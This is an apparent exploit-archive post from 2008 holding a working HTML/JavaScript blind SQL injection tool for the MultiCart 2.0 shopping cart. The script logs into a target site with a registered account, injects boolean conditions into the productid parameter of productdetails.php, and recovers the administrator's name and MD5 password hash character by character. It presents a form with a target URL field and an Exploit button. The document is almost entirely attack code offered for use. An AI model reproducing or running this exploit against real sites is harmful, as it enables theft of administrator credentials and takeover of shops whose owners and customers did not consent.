multicart-blindsql.txt
Posted on 21 February 2008
<html> <head> <style type="text/css"> <!-- .style1{color: #CC0000} .style2 { color: #000000; font-size: 12px;} .style3 {color: #FF0000; font-weight: bold; font-size: 12px; } .style4 {color: #FF0000; font-size: 10px;} --> </style> <title>MultiCart 2.0 Remote SQL Injection Vulnerbility</title> <script language="Javascript" type="text/javascript"> /* ------------------------------------------------------------------------------- - MultiCart Blind SQL Injection Exploit (productdetails.php) - - Info ---------------------------------------------------------------------- - SAVE AS exploit.HTML and RUN in FIREFOX ----------------- - Author: t0pP8uZz & xprog ------------------------------------------- - Exploit Coded By t0pP8uZz ----------------------------------------- - Site: h4ck-y0u.org / milw0rm.com --------------------------------- ------------------------------------------------------------------------------ - Needs Registration First! ------------------------------------ - Peace -------------------------------------------------------------------- ------------------------------------------------------------------------------ */ var site, user, pass, tbl, pid, res = ""; function Start() { site = document.getElementById("site").value; user = document.getElementById("user").value; pass = document.getElementById("pass").value; tbl = document.getElementById("tbl").value; pid = document.getElementById("pid").value; Login(); Main(1, 48); } function Main(substr, num) { var url = site+"/productdetails.php?productid="+pid+"%20and%20ascii(substring((SELECT concat(admin_name,0x3a,admin_password) FROM "+tbl+"),"+substr+",1))="+num+"/*"; netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead"); var xmlhttp = new XMLHttpRequest(); xmlhttp.onreadystatechange = function() { if(xmlhttp.readyState == 4) { var content = xmlhttp.responseText; if(content.match(/doesn't exist/i)) { alert("Table '"+tbl+"' Doesnt Exist! Try Another.."); return false; } var ele = document.getElementById("output"); if(!content.match(/SQL syntax/i)) { res += String.fromCharCode((num)); ele.value = res; num = 48; substr++; } else { if(num == 59) { num = 96; } else { num++; }} if(res.match(":")) { var check = res.split(":"); if(check[1].length >= 32) { alert("Site Exploited! Admin Details: "+res); return true;} } Main(substr, num); } }; xmlhttp.open("GET", url, true); xmlhttp.send(null); }; function Login() { var data = 'txtUserName='+user+'&txtPassword='+pass+'&loginbox=+'; netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead"); try { var xmlhttp = new XMLHttpRequest(); } catch(e) { alert("Use Firefox! Error: " + e.description); } xmlhttp.open("POST", site + "/index.php", true); xmlhttp.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9"); xmlhttp.setRequestHeader("Content-Length", data.length); xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlhttp.send(data); }; </script> </head> <body> <p class="style1">- MultiCart 2.0 Remote Blind SQL Injection Vulnerbility -</p> <p class="style2">Site: <input type="text" id="site" /> (URL to multicart site ie: http://www.site.com/multicart)</p> <p class="style2">Table: <input type="text" id="tbl" /> (settings table name, default: "multicart_settings" others used: "mc_settings", "settings")</p> <p class="style2">User: <input type="text" id="user" /> (Register on the site first, then enter username here)</p> <p class="style2">Pass: <input type="text" id="pass" /> (Register on the site first, then enter password here)</p> <p class="style2">PID: <input type="text" id="pid" /> (a valid product ID)</p> <p class="style2"><input type="button" onclick="Start();" id="button" value="Exploit" /></p> <p class="style3">Output: <input type="text" id="output" size="100" /></p> <p class="style2">Notes: MultiCart uses the MD5 algorithms, The admin login is at /admin/</p> <p class="style4">Coded By t0pP8uZz - h4ck-y0u.org</p> </body> </html>
